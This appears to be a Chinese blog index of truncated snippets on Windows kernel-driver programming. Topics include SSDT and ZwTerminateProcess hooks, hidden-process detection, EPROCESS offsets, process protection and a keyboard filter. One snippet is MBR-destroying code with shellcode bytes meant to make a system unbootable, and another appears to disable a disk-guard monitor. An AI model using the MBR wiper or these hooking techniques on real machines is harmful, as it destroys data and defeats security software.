坦然

最近期末答辩不知道写什么好，就写一个安全软件吧。软件使用驱动和C++编写，大概多数安全软件都是这样吧。时间关系，就不说那么多了，直接入正题吧。在此先感谢“伊丽_杀_白”、“堕落天才”、“antirootkit”等提供的优秀文章，我只是在他们基础之上修改了一下。伊丽_杀_白    暴力搜索内存空间检测隐藏进程：http://bbs.xdnice.com/thread-377796-1

写ZwTerminateProcess hook的时候hook到ZwTerminateProcess的参数是HANDLE ProcessHandle和NTSTATUS ExitStatus。结构如下：NTSTATUS   ZwTerminateProcess(     IN HANDLE  ProcessHandle,    IN NTSTATUS  ExitStatus

首先是同步问题，通过Ring3创建事件，并将该事件传递给Ring0，同时Ring3创建监控线程，等待Ring0发起事件。                                           监控到事件（通知）Ring0（监控）----------------------------------------------------------------> Ring3  

驱动程序的加载函数DriverEntry是运行在System进程中的．通过PsGetCurrentProcess可以获取System进程的内核EPROCESS结构的地址，然后从该地址开始寻找"System"字符串．找到后，便是EPROCESS的进程名存放的偏移处．得到进程名在EPROCESS结构的偏移后，以后的进程调用驱动的时候，就可以直接在该偏移处获取当前进程名．代码如下：DWORD Get

typedef struct _SECTION_IMAGE_INFORMATION {PVOID EntryPoint; ULONG StackZeroBits; ULONG StackReserved; ULONG StackCommit; ULONG ImageSubsystem; WORD SubsystemVersionLow; WORD SubsystemVe

// 参数1：LPSECURITY_ATTRIBUTES pEventAttributes 安区参数 一般用户不用考虑它，传入NULL。 // 参数2：表示创建的事件是否是手动模式。 // 如果是TRUE，则是手动模式的事件，事件处于激发状态后，需要手动设置才能回到未激发状态。 // 如果是FALSE，则是自动模式，当事件处于激发状态后，遇到任意一个等待（如：WaitForSingleObject

///////////////////////////////////////////////////////////////////////////////中断请求(IRQ)中断控制器(PIC)PIC的中断向量IRQ编号       设备名称            用途IRQ0          Tine                计算机系统计时器IRQ1        

///////////////////////////////////////////////////////////////////////////////互锁函数ExInterlockedXX系列函数通过自旋锁实现 不可以操作分页数据ExInterlockedXX互锁操作函数内核函数                                 功能ExInterlock

在内核中，通过进程ID，得到进程名称，有多种方法。我使用了两种方法，第一种是使用ZwOpeProcess得到句柄然后ObReferenceObjectByHandle函数得到PEPROCESS结构，然后char *ProcessName = (char*)EProcess + 0x174;第二种方法是得到PEPROCESS结构之后，使用PsGetProcessImageFileNa

#define MAKELONG(a, b) ((unsigned long) (((unsigned short) (a)) | ((unsigned long) ((unsigned short) (b)))          VOID ShowIDTinfo(                     IN struct _KDPC  *Dpc,              

DRIVER_OBJECT STRUCT ; sizeof= 0A8h_Type SWORD ? ; 0000h (IO_TYPE_DRIVER = 4) (original field name Type)_Size SWORD ? ; 0004h (original name Size); The following links all of the devices created

/*++ BUILD Version: 0004 // Increment this if a change has global effectsCopyright (c) Microsoft Corporation. All rights reserved.You may only use this code if you agree to the terms of the Win

代码：#include typedef NTSTATUS (*PSPTERPROC) ( PEPROCESS Process, NTSTATUS ExitStatus );PSPTERPROC MyPspTerminateProcess ;NTSTATUSPsLookupProcessByProcessId( IN HAND

#include "ntddk.h"ULONG GetCidAddr(){ PUCHAR addr; PUCHAR p; UNICODE_STRING pslookup; ULONG cid; RtlInitUnicodeString (&pslookup, L"PsLookupProcessByProcessId"); //RtlInitU

一、设备对象(DEVICE_OBJECT)kd> dt _device_objectntdll!_DEVICE_OBJECT   +0x000 Type             : Int2B   +0x002 Size             : Uint2B   +0x004 ReferenceCount   : Int4B   +0x008 DriverObject 

驱动#include "ntddk.h"#define NT_DEVICE_NAME L"\\Device\\ProtectProcess"#define DOS_DEVICE_NAME L"\\DosDevices\\ProtectProcess"#define IOCTL_PROTECT_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN

#include "ntddk.h"#include "ntddkbd.h"#include "stdio.h" #define KEY_UP 1#define KEY_DOWN 0 #define LCONTROL ((USHORT)0x1D)#define CAPS_LOCK ((USHORT)0x3A

#include//EPROCESS结构大小，我的系统是XP SP3，所以0x260，不过经过测试，这里设置成比实际EPROCESS小也是没问题的#define EPROCESS_SIZE 0x260 #define PEB_OFFSET 0x1B0 //PEB偏移，下面就不注释了#define FILE_NAME_OFFS

DWORD dwBytesReturned = 0; BYTE bytBuffer_1[512]; BYTE bytBuffer_2[512]; CHAR string[2048]; HANDLE hDevice, hDriver; BOOL bRet; hDevice = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_READ,

#include typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation, SystemProcessorInformation, SystemPerformanceInformation, SystemTimeOfDayInformation, SystemPathInformation, S

#include //#include typedef unsigned long DWORD;#pragma pack(1)typedef struct ServiceDescriptorEntry{ unsigned int *ServiceTableBase; unsigned int *ServiceCountTableBase; unsigned in

// apisearchEngine.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include DWORD __stdcall GetStrLengthA(char* szName){ _asm { push edi push eb

#include #define DEVICE_NAME L"\\Device\\KillHDDGMon"#define LINK_NAME L"\\DosDevices\\KillHDDGMon"#define IOCTL_WRITE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800,METHOD_BUFFERED, FILE_ANY_ACCESS)#def

//**************************************************************************//*//* //* //*文件说明：//* 获取系统内核版本//*******************************************************

破坏MBR的代码，只有破坏作用，使系统无法进入。。。来源于网上。。#include #include //shellcode随便写了点 能破坏MBR,无法进入系统unsigned char scode[]= "\xb8\x12\x00" "\xcd\x10\xbd" "\x18\x7c\xb9";DWORD writeMBR(){ DWORD d

#includeVOID DriverUnload(IN PDRIVER_OBJECT DriverObject){ KdPrint(("Driver Unload is Run!\n"));}NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath){